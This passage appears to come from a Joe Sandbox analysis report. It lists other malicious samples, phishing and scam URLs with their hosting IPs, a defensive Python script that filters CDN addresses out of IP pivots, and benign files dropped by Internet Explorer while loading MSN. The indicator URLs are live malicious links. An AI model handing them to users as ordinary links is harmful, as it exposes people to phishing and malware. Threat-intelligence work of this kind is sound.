  boatnet.arm6.elf   malicious   Mirai   context: 34.249.145.219
  kwari.arm.elf   malicious   Unknown   context: 54.168.12.166
FASTLYUS
  https://gogl.to/3HGT   malicious   CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT   context: 199.232.214.172
  Epsilon.exe   malicious   Unknown   context: 185.199.111.133
  https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com   malicious   HTMLPhisher   context: 151.101.194.137
  https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188   malicious   KnowBe4   context: 199.232.192.193
  https://tepco-jp-lin;.%5Dshop/co/tepco   malicious   Unknown   context: 199.232.188.157
  eXbhgU9.exe   malicious   LummaC   context: 185.199.110.133
  Purchase Order Summary Details.vbs   malicious   LodaRAT, XRed   context: 185.199.108.133
  Purchase Order Summary Details.vbs   malicious   LodaRAT, XRed   context: 185.199.108.133
  Supplier.bat   malicious   Unknown
                                                                • 185.199.110.133
                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                • 185.199.111.133
Match: 7dcce5b76c8b17472d024758970a406b
Associated Sample Name / URL | Detection | Threat Name | Context
Hwacaj.exe | malicious | Darkbot | 151.101.2.137, 18.244.18.38
Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 151.101.2.137, 18.244.18.38
Pago.xls | malicious | AveMaria, UACMe | 151.101.2.137, 18.244.18.38
NB PO-104105107108.xls | malicious | Unknown | 151.101.2.137, 18.244.18.38
PyrNUtAUkw.docx | malicious | Unknown | 151.101.2.137, 18.244.18.38
SLNA_Updated_Medical_Grant_Application(1).docx | malicious | Unknown | 151.101.2.137, 18.244.18.38
CMR ART009.docx | malicious | Unknown | 151.101.2.137, 18.244.18.38
Cot90012ARCACONTAL.xls | malicious | Remcos | 151.101.2.137, 18.244.18.38
Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 151.101.2.137, 18.244.18.38
SOA USD67,353.35.xla.xlsx | malicious | Unknown | 151.101.2.137, 18.244.18.38
                                                                No context
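A shared address in the Context column is only a pivot when the address is not shared infrastructure. In the tables above, 151.101.2.137 / 151.101.194.137 and the 199.232.x.x addresses are Fastly, 185.199.108.133 to 185.199.111.133 are GitHub Pages, and the 3.x / 13.x / 18.x / 34.x / 54.x addresses are Amazon ranges, which is why unrelated Mirai, AsyncRAT, LodaRAT and Darkbot analyses all appear to "share" them; the dropped files listed below were written by iexplore.exe while fetching MSN home-page content, so this sample's own overlap with those rows is CDN traffic, not C2. The script below is an added example and not part of the Joe Sandbox report: it re-keys a transcribed subset of the rows by IP, counts distinct samples per address, and discards addresses that fall inside known shared ranges. The range table is an assumption kept deliberately short (the CloudFront prefix in particular is assumed) and should be replaced with current published ranges before use.

```python
"""Pivot Joe Sandbox cross-reference rows on shared context IPs, ignoring CDN ranges."""
import ipaddress
from collections import defaultdict

# Constructed from rows visible in the report: (sample, threat name, context IP).
ROWS = [
    ("ARMV7L.elf", "Mirai", "54.247.62.1"),
    ("systempreter.exe", "AsyncRAT", "3.69.157.220"),
    ("rjnven64.elf", "Mirai", "54.171.230.55"),
    ("Epsilon.exe", "Unknown", "185.199.111.133"),
    ("eXbhgU9.exe", "LummaC", "185.199.110.133"),
    ("Purchase Order Summary Details.vbs", "LodaRAT, XRed", "185.199.108.133"),
    ("Purchase Order Summary Details.vbs", "LodaRAT, XRed", "185.199.108.133"),
    ("Supplier.bat", "Unknown", "185.199.110.133"),
    ("Supplier.bat", "LodaRAT, XRed", "185.199.111.133"),
    ("Hwacaj.exe", "Darkbot", "151.101.2.137"),
    ("Hwacaj.exe", "Darkbot", "18.244.18.38"),
    ("Pago.xls", "AveMaria, UACMe", "151.101.2.137"),
    ("Pago.xls", "AveMaria, UACMe", "18.244.18.38"),
    ("Cot90012ARCACONTAL.xls", "Remcos", "151.101.2.137"),
    ("Cot90012ARCACONTAL.xls", "Remcos", "18.244.18.38"),
]

# Ranges whose reuse across samples is expected rather than a link between them.
# Fastly and GitHub Pages prefixes are public; the CloudFront prefix is an
# assumption for this example, refresh all of them from the providers' lists.
SHARED_INFRA = {
    "Fastly": [ipaddress.ip_network("151.101.0.0/16"),
               ipaddress.ip_network("199.232.0.0/16")],
    "GitHub Pages": [ipaddress.ip_network("185.199.108.0/22")],
    "CloudFront (assumed)": [ipaddress.ip_network("18.244.0.0/16")],
}


def classify(ip):
    """Owner label for an IP inside a shared-infrastructure range, else None."""
    addr = ipaddress.ip_address(ip)
    for owner, nets in SHARED_INFRA.items():
        if any(addr in net for net in nets):
            return owner
    return None


def pivot(rows, min_samples=2):
    """Group rows by context IP; keep IPs seen in at least min_samples distinct samples.

    Each value carries the sorted sample names, the sorted set of threat names
    (comma-separated names are split), and the shared-infrastructure owner if any.
    """
    by_ip = defaultdict(lambda: {"samples": set(), "families": set()})
    for sample, family, ip in rows:
        by_ip[ip]["samples"].add(sample)
        by_ip[ip]["families"].update(f.strip() for f in family.split(","))
    result = {}
    for ip, info in by_ip.items():
        if len(info["samples"]) >= min_samples:
            result[ip] = {
                "samples": sorted(info["samples"]),
                "families": sorted(info["families"]),
                "shared_infra": classify(ip),
            }
    return result


def strong_pivots(rows, min_samples=2):
    """Reused IPs that are NOT shared infrastructure: the ones worth chasing."""
    return {ip: v for ip, v in pivot(rows, min_samples).items()
            if v["shared_infra"] is None}


if __name__ == "__main__":
    for ip, info in sorted(pivot(ROWS).items()):
        tag = info["shared_infra"] or "no known shared range"
        print(f"{ip:16} {len(info['samples'])} samples  {', '.join(info['families'])}  [{tag}]")
    print("strong pivots:", strong_pivots(ROWS) or "none")
```

On the transcribed rows every reused address lands in a shared range, so strong_pivots returns nothing: the cross-reference tables above link this sample to Darkbot, AveMaria and Remcos analyses only through CDN addresses.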
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):3.8046022951415335
                                                                Encrypted:false
                                                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):127
                                                                Entropy (8bit):4.936916038399468
                                                                Encrypted:false
                                                                SSDEEP:3:D9yRtFwsSxzqC+eAsOFETYHFk6YRmhJAqTUCfZKaKb:JUF+FqCqdFFYRpUkb
                                                                MD5:DACB549C576CC47323C10066AA00162E
                                                                SHA1:99C1E7789E6A81ACD94F7782F8A8307F96E02AAC
                                                                SHA-256:C02E4C56295FA7615B69128C0CC094D07750F926934F12EDDA3B751BCE7B82DD
                                                                SHA-512:DD1F3303032E7F7C21DCCDF178A51765FA33C31B327D5A2A2C06FA64752B196EFB62E62FE57C638EDB2A0A053D837C8B7FF55FDCC115B8833447C272AAB49E7B
                                                                Malicious:false
                                                                Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241220.296&quot;}" ltime="2949094144" htime="31152986" /></root>
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):2.053920544598572
                                                                Encrypted:false
                                                                SSDEEP:24:rewWGo/QByNgGW/1yNOyN8ZyN1NlWgK1NlWg:r2Go4ByKGW9yYySZyigKQg
                                                                MD5:3064CFFECA40DEF9B5608C0E522D22BF
                                                                SHA1:91A3520A316043C1F019FEB762DB299EF4D3809C
                                                                SHA-256:FC647EA756DE14F181054AE7F9B70435D52CD3242547CE8E6AE9845085E70BD6
                                                                SHA-512:B567BC9399F2CDA6D144268719D115B736DEC56DDC477BFD327E743CD6FA3511224067A3E47C43ED2A36A2D8A89DE99DA92B7ABAD5F1961978B6712FACF3826E
                                                                Malicious:false
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................X.Z[................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.9.a.a.O.5.k.3.H.7.x.G.P.O.O.z.0.u.7.W.R.W.w.=.=.........:.......................................
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):2.2139276544593613
                                                                Encrypted:false
                                                                SSDEEP:24:rEGDdARHQNljFZyMuKvqy6yEyvy5DlsN5AcwNljFZyMXvqy:rEGpARAFZLuKS9LYu0O7FZLXS
                                                                MD5:BFCFFF68E5325944BDB31A678EF8EB80
                                                                SHA1:A90A83FA8A6ED0B91A6D4B744D26675DED381F4F
                                                                SHA-256:548113CB3CCB336AEA7179E4C7B97F8C0094809A1E829A93877B95959B170C6A
                                                                SHA-512:512024EBFFB363FCD51BE73CAE2D11CE14FC8C2850C44EE4C14840684C344B306C2F0905162BB0DA373C915AFED6F22616733DF20DE916A39D42DA8C9E6E0362
                                                                Malicious:false
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@..Z[................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):6006
                                                                Entropy (8bit):6.3542973412192145
                                                                Encrypted:false
                                                                SSDEEP:96:/zS29dcBUXqQVObIg0ZFY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygNV:/zSAcBKjg0jYh7TWqFpzTTGjT/Vfym
                                                                MD5:5602C5E0C99260FCAC3F99E850BC6A80
                                                                SHA1:3DC7BF03C5E8B8F3D8508FC588DF85FEC4F9C56D
                                                                SHA-256:0935F12421E0A71E26C0208268225253235A9C8FAA45DDEDD4C9C33730A6A9DE
                                                                SHA-512:CD3CA9A12740C63F5CF403F38365C1D8D166735220F7E1587B53C93118FECA4CEF3E273B86110720B97F210F1785B41559B6C9DC632BA4C83E14A890A072492A
                                                                Malicious:false
                                                                Preview:........D.h.t.t.p.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............._......._....D.h.t.t.p.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):533
                                                                Entropy (8bit):7.415663553371965
                                                                Encrypted:false
                                                                SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                                                MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                                                SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                                                SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                                                SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...<... .....N.......pHYs.................sRGB.........gAMA......a.....IDATx..=O.1....$....1..7.....p32..)..Yw..p..IL.$qT'......1.#.h..j.5...9...~...w.....oe.....]8,..|..........``.$a.K.&Lq........D,D..8e.c.....fQ...u..%.(..b..8A......,>@6....Y*...9.(...d7........,!zr.N...T}.....j...NY'..|.=N2Q&<?3....@..-.e.h....F#..2.v...n..!-.e..&........%.e........y.c.y,.e........4'40.t"...B.........D.../[D..6j....^>.....g...3...5<Hv.H../M.+Y`.......OXw<a.al..aF.@.../.E....=;S.K....s.......IEND.B`.
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:HTML document, ASCII text, with very long lines (58335), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):193378
                                                                Entropy (8bit):5.451282730098038
                                                                Encrypted:false
                                                                SSDEEP:3072:DZRDgfyd5FO93Qiq6I8khsNyh/P9OZ8TixYE:zgfyA93Qx6I8hNyhX91OxYE
                                                                MD5:C1DD7EB29B861DE41A3735EF212AE152
                                                                SHA1:CE30E5303ED8B78E3CB42573496DA9DB72F9BCBE
                                                                SHA-256:73768C4FB5E903A294A48B9713790FD3ECD8C025B444590E76C235FB42DDCE37
                                                                SHA-512:ED5058F68F69CE4BA79FC87944C65845914EEF8297AF122889E4ECC91E1FC510E37D7A8A92F5AFAF396EFAED5513987FCFB7632B11BB9E1EC16E2EA6AE89362C
                                                                Malicious:false
                                                                Preview:<!DOCTYPE html>..<html lang="en-us" dir="ltr" >..<head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,pnpwxexpire-c,bing_v2_scope,prg-cg-crosaloc1,prg-adspeek,prg-pr2-widget-tab,prg-pr2-marketsel-c,routeugcexp,1s-fcrypt,prg-wpo-pnpc,1s-ntf2-evlcfc,1s-ntf2-bknlc,1s-ntf2-iptlc,1s-pr2-evlc,1s-pr2-evlcbb,1s-pr2-evlch,1s-pr2-evlcn,1s-pr2-evlcrp,1s-pr2-evlct,1s-prg2-lifecycle,1s-wpo-pr2-ncard,1s-wpo-pr2-pnpfilter,1s-wpo-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_t,prg-pr2-pred-dyf,chatn_v2_t2,prg-pr1-uc-no-store-t,1s-p1-promotedondmd,1s-p1-ua4osvhw,1s-wpo-pr1-promad,prg-1unified-no-store,2412-i-ncnf-t,1s-notifmapping,1s-shp-rc-t-decu1,1s-shp-rc-ta-dctime,1s-shp-rc-ta-decay,1s-shp-rc-ta-decu1,1s-shp-rc-ta-initw,1s-shp-rc-ta-lam01,1s-shp-rc-ta-min1,1s-shp-rc-ta-min4,prg-sh-frnrc,prg-wx-dhgrd,prg-sh-de
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):265561
                                                                Entropy (8bit):5.432386621514022
                                                                Encrypted:false
                                                                SSDEEP:3072:Hw+voYPbYRFKstM4weHKyhqGF0/UnwQXXiR4U2JH5:HLvoMKkstM4wBVUnjJZ
                                                                MD5:1C984AC84FC70C69942DF2AD7CD7933E
                                                                SHA1:61A5C268E80AF49D161ADD6B6EE0DB6FC02EB6EA
                                                                SHA-256:8D7E6CE8CC3594239246D481140C43546A2058B5B75DCA2048389C3713B9FE15
                                                                SHA-512:1B19BC2DC7CDFD89A5657D0BDB9D9E63F6396994426780241E2F5F7669ECCFE4102814593A0E15170349F7340062D29AD8750B4B5DA43E63D624E3BA64F2FE98
                                                                Malicious:false
                                                                Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["common"],{54085:function(e,t,n){var r;n.d(t,{p:function(){return r}}),function(e){e.Desktop="desktop",e.Phone="phone",e.Tablet="tablet"}(r||(r={}))},21290:function(e,t,n){n.d(t,{GB:function(){return s},Km:function(){return c},Oq:function(){return f},Sp:function(){return d},Wc:function(){return u},cm:function(){return p},e_:function(){return g},oH:function(){return h},r7:function(){return a},yL:function(){return l}});var r=n(45331),i=r.z.Alert,o={build:""};function a(e){Object.assign(o,e)}var s={id:22012,severity:i,pb:o},c={id:22014,severity:r.z.Critical,pb:o},u=(r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,{id:22027,severity:r.z.Critical,pb:o}),l=(r.z.Critical,r.z.Critical,{id:22031,severity:i,pb:o}),p={id:22032,severity:i,pb:o},d={id:22033,severity:i,pb:o},f={id:22034,severity:i,pb:o},h={id:22050,severity:i,pb:o},g={id:22051,severity:r.z.Deprecated,pb:o};r.z.De
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):231602
                                                                Entropy (8bit):5.762554862752807
                                                                Encrypted:false
                                                                SSDEEP:1536:Bl4m9Uoyafb1Hjhw3dsrWnQHdiJg7hJ5BjNnaAyGJNyWVzskeUjlWSGu9bCxKYb1:Mm9r0g9KAvyWs7Gb9+Fb1Zzae
                                                                MD5:3ACCB914F415F2E2C36775D5783CF112
                                                                SHA1:7CB1F2677020EAFEAF7BFCCF2E15BC7DC45DC758
                                                                SHA-256:D3722105B5C0D92A3E85ECA10174193CD0AF84DE74586B2EEE991182CFF5AFFE
                                                                SHA-512:3024450B40BBF7F3482F465BC831E4826543DE5D6A634584AAE7C5EA4B72D8F6E75A675D9371BF92303E051BFF94ACE431A082D8BD5E89CB664FC0DEF41DB19B
                                                                Malicious:false
                                                                Preview:!function(){"use strict";var t,e,n,r={12451:function(t,e,n){var r=n(8460),i=n(2132),a=n(82589),o=n(9925),s=n(96838),c=n(56595),l=n(54616),d=n(82512),u=n(3290),f=n(8488),p=n(4577),m=n(4108),g=n(23159),h=n(65212),v=n(27310),b=n(54085),x=n(29714),y=n(3460),w=n(91898),k=n(42390),C=function(){function t(){}return Object.defineProperty(t,"viewType",{get:function(){return x.Gq.get(this.viewTypeKey)},set:function(t){x.Gq.set(this.viewTypeKey,t)},enumerable:!1,configurable:!0}),t.trackCallbacks=function(){switch((0,y.Bn)().currentColumnArrangement){case w.K$.c1:case w.K$.c2:t.viewType="size2column";break;case w.K$.c3:t.viewType="size3column";break;case w.K$.c4:t.viewType="size4column"}return t.viewType},t.getTelemetryProperties=function(t,e){var n=!("false"===k.c.getQueryParameterByName("enableTrack",e)),r=k.c.getQueryParameterByName("ocid",e)||"hpmsn",i=u.jG.ActivityIdLowerCaseNoHypens,a="0",o=!1;if(d.Al&&d.Al.ClientSettings){var s=d.Al.ClientSettings;"true"===s.static_page&&(o=!0),a=s.browser
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65448)
                                                                Category:dropped
                                                                Size (bytes):94707
                                                                Entropy (8bit):5.407635683386335
                                                                Encrypted:false
                                                                SSDEEP:768:GSqLAEwLuZAFL1oL3SDk5v1VWkNWPEYydLLnnS+7ySGAEMbiYnRGwVKVt+RFVDh4:GJMCUCuW3WkNtnnDGgGwVKWklyGEQ
                                                                MD5:AA2BEDDF57312EF1CD312880E2729EBA
                                                                SHA1:8E53B59585F8C947924355AFDC72A62E27CD001C
                                                                SHA-256:16933DCF75634F75F0A09A67FB0FF7D9D0556188A888CDD89E05F2D21997BB51
                                                                SHA-512:64AC2CCE15619DA127C5F1B637BBB39C1EB3DB69DE30FB690863C7390EC0A6D0BA2BEE9B9BC20DFF2B4044D17CED483CE5294E624F792652E8E4E1AD6FFAD4DD
                                                                Malicious:false
                                                                Preview:/*! For license information please see microsoft.b109cceab5e009228460.js.LICENSE.txt */."use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["microsoft"],{39115:function(n,e,t){t.d(e,{Z:function(){return M}});var r=t(68897),i=t(44611),o=t(89734),u=t(98693),a=t(38629),c=t(64648),f=t(73966),s=t(64973),l=t(26105),d=t(46540),v=500,p="Channel has invalid priority - ";function g(n,e,t){e&&(0,f.kJ)(e)&&e[c.R5]>0&&(e=e.sort((function(n,e){return n[s.yi]-e[s.yi]})),(0,f.tO)(e,(function(n){n[s.yi]<v&&(0,f._y)(p+n[c.pZ])})),n[c.MW]({queue:(0,f.FL)(e),chain:(0,l.jV)(e,t[c.TC],t)}))}var h=t(27218),m=t(24200),y=t(92687),b=t(28055),S=function(n){function e(){var t,r,a=n.call(this)||this;function l(){t=0,r=[]}return a.identifier="TelemetryInitializerPlugin",a.priority=199,l(),(0,i.Z)(e,a,(function(n,e){n.addTelemetryInitializer=function(n){var e={id:t++,fn:n};return r[c.MW](e),{remove:function(){(0,f.tO)(r,(function(n,t){if(n.id===e.id)return r[c.cb](t,1),-1}))}}},n[s.hL]=fu
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (44387), with NEL line terminators
                                                                Category:dropped
                                                                Size (bytes):194844
                                                                Entropy (8bit):5.419132326845799
                                                                Encrypted:false
                                                                SSDEEP:3072:oSYgu0Mj/PJ3floxEsQtzbwDZ777/3DwLps0p:oSYguVJvSa5+Z7uOE
                                                                MD5:1C8B7CFD513B7ECA52BA64947CEE70E4
                                                                SHA1:6BA3FBE2E7514E981EB68E9A92E9EA7A499CCC0C
                                                                SHA-256:D1730E14E7E3D2362E6C5FF0C9C36E08660F87317EC44551FAED419263240F2C
                                                                SHA-512:1F6567D3870CFBE002CD447135020C9F1319DFAB76E3CEAFE4C62BDD79F78F2AB3E5958DE9E068A3937E1C469978FC2E4A56015B82E06FE1377A78B47D1B06DC
                                                                Malicious:false
                                                                Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["vendors"],{29558:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},74322:function(t){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},25135:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t)&&null!==t)throw TypeError("Can't set "+String(t)+" as a prototype");return t}},6664:function(t,e,r){var n=r(23362),o=r(35093),i=r(79549),a=n("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},99027:function(t,e,r){var n=r(58306).charAt;t.exports=function(t,e,r){return e+(r?n(t,e).length:1)}},57699:function(t){t.exports=function(t,e,r){if(!(t instanceof e))throw TypeError("Incorrect "+(r?r+" ":"")+"invocation");return t}},45150:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t))throw TypeError(String(t)+" is not an object");return t}},60410:function(t){t.exports=
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):3.8046022951415335
                                                                Encrypted:false
                                                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):5.912342955561912
                                                                Encrypted:false
                                                                SSDEEP:96:YY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygN6:YYh7TWqFpzTTGjT/VfyZ
                                                                MD5:A73B8189E32D3A97AE2FBF1A57931D49
                                                                SHA1:560A8EA628A89A82233BF4288166B54789242966
                                                                SHA-256:855F6B5EEA22A22F5F4ABCCEEED4B8969EFB3A99443036EB5EB64F5F46C8FD8E
                                                                SHA-512:2B016E28A7E63DE8FCAD90DDB38CCD5D875A22CF53D723E055B7C7C9B7589CB818883234C6682CA25112AF3CB4BA61A1AED384C1638C04905FC6FAFDD37F79A4
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... .................................G..."...?..<2...)...'...-...8..uD...@...8...............2...2...1...1...2...4...7...6.......................................T...Q...S..*J...@...9...7...:...B...K...U.|/G...[.r.....C...=...?..c@...D...E...D...D..{]...H...................................i.a.:...].p.U.{.N...H...F...H...L...S.~.\.q.f.c4`.h...g.R...O...P...S...V...V...U...S...S.. T...................................m.V.o.R.i.^.a.j.Z.u.T.}.R...S...V.z.\.q.e.e.l.V.i.E j.H.Y...Y...Z...Z...Z...Z...Z...Y...Y..KY...................................g.E.e.A.j.K.k.X.f.c.`.k.^.o.^.n.a.j.f.c.l.X.h.H.[.5.E...U...[...[...[...Z...Z...Z...Z...Z..cZ...................................Z.5.N.(.[.6.d.B.k.P.k.X.j.].j.].k.Z.m.S.h.H.\.7.M.$.@..SK.8.]...Z...[...[...[...[...[...[..d[...................................M.&.L.#.L.#YR.*.].7.d.B.h.H.j.I.h.G.c.?.Z.4.N.%.?...=...}h....}.yb.\y..Z...[...[...[...[..Q[.......................................A...@...B...I...Q.(.V./.X.1.V.0.Q.
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89947
                                                                Entropy (8bit):5.290839266829335
                                                                Encrypted:false
                                                                SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                Malicious:false
